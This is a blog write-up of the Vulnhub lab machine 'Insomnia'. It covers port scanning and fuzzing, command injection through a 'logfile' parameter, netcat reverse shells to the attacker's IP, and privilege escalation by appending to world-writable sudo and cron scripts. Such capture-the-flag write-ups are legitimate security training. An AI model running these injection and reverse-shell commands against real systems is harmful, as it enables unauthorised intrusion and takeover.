NepCodeX

Byte Musings: Where Tech Meets Curiosity


Insomnia Walkthrough – Vulnhub – Writeup

insomnia walkthrough vulnhub writeup

Insomnia is an easy machine from Vulnhub by alienum. We have to understand LFI, RCE, sudo abuse and cron job abuse to get to the root machine. Here, I will be doing the full method, i.e. getting the user flag first and then getting the root flag. However, once you get the foothold, you can directly go for the root access but this is not intended by the author. “Insomnia Walkthrough – Vulnhub – Writeup”.

Link to the machine: https://www.vulnhub.com/entry/insomnia-1,644/

Walkthrough of Orasi machine by the same author

Identify the target

We have to identify the IP address of the target first.

fping -aqg 10.0.2.0/24
caabf6e530d44ea7a00f2a51665f1c86

I got my IP address as 10.0.2.15 and that of the target as 10.0.2.114.

Scan the open ports

Next, we have to scan the open ports on the target so that we get the services that we can interact with.

sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.114
f95b2c696c2c4edf955068225a0518da

There is only one port open. So, we might have to go deep and not wide which is easier in my view.

Enumerate the web server

The default page has a simple chat interface that works one way only.

2138805e90e44a31bfdf79e0e1cc92ab

When we do a directory scan, we can get new paths.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .html,.php,.txt -u http://10.0.2.114:8080/FUZZ -of html -o dir.html -fs 2899
1719ddd6337f4c4fb92a74aa36d31ad9

The chat.txt path stored the chat messages.

18a921640d8b406a8eb9461762e99614

However, the administration.php file had something interesting.

e56d15f2c4bc4095960c57214222cbce

We can see from the screenshot above that it might be expecting something after the colon symbol. Then, I checked the chat page.

10d867a324f747daabe96c25b07b209d

Here, we can see a line on the chatbox. So, we can guess that the file was expecting something. Therefore, I tried fuzzing the get parameter.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://10.0.2.114:8080/administration.php?FUZZ=anything' -of html -o admin-get.html -fs 65
769ab6ada6094cc4859a8a325826e9cb

Luckily, we got a get parameter logfile that also allowed file inclusion and code execution.

7c24951328d14d068f41d7f6a95a91ec

Well, it’s not file inclusion but based on the file, it performed some operations. Thus, let’s try a different payload.

?logfile=chat.txt;whoami
f0ad46ad18044e1983dd5a7ea87c3914

This gave the execution of the command whose results we can see on the chatbox. Hence, we can try spawning a reverse shell on port 9001.

# on local machine
nc -nlvp 9001

Let’s check if the target has netcat available.

?logfile=;which nc
4102e0c909394da9b69459fbf6238ecd

Since it has netcat, we can connect to our port.

?logfile=;nc -e /bin/bash 10.0.2.15 9001
cedfa4bc10bd4671931e31d8c1a180a8

Finally, we got the foothold.

Upgrade to an intelligent reverse shell

Get a user’s access

Next, I checked the sudo permissions of the user www-data.

sudo -l
a4cf3043b986429799592a723a31301a

From the screenshot above, we can see that the user can execute a script without requiring a password as the user julia. So, I checked the permissions on the file.

cd /var/www/html
ls -al
aa049fc57e4e4af6becd7651aee36cb7

It allowed other uses than the owner root to write on it. Therefore, I added the binary bash at the end of the script.

echo '/bin/bash' >> start.sh
5a4fdfc95b074cf4864ba0d86fe99876

So, now, if we execute the script as the user julia, we will also be executing bash as the same user.

sudo -u julia bash /var/www/html/start.sh
e7468399a2f147f093fb6d58d1ddbedd

Finally, I got the user’s flag.

cd
ls -al
cat user.txt
0f697079ff3448ddbbb3fa93264ef9c2

Root privilege escalation

When I looked at the crontab, I got a script being run every minute.

cat /etc/crontab
d7d04b3595dc46869954495b9cf294e8

Then, we can check the permission of the script as well as we did for the previous script.

ls -l /var/cron/check.sh
913c85be4d744953999c4ab4cab8a3ec

It also had access to writing for other users. However, since this runs in the background, it’s better to spawn another reverse shell.

nc -nlvp 9002

So, I added the code to spawn a reverse shell on the script.

echo 'nc -e /bin/bash 10.0.2.15 9002' >> /var/cron/check.sh
ac59d44cb95d4e748c589a4371653694

After some time, I got the reverse shell. Finally, I got the root flag.

cd
ls -al
cat root.txt
5bd47d21899242a4afb38818929723b7


5 1 vote
Article Rating
Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments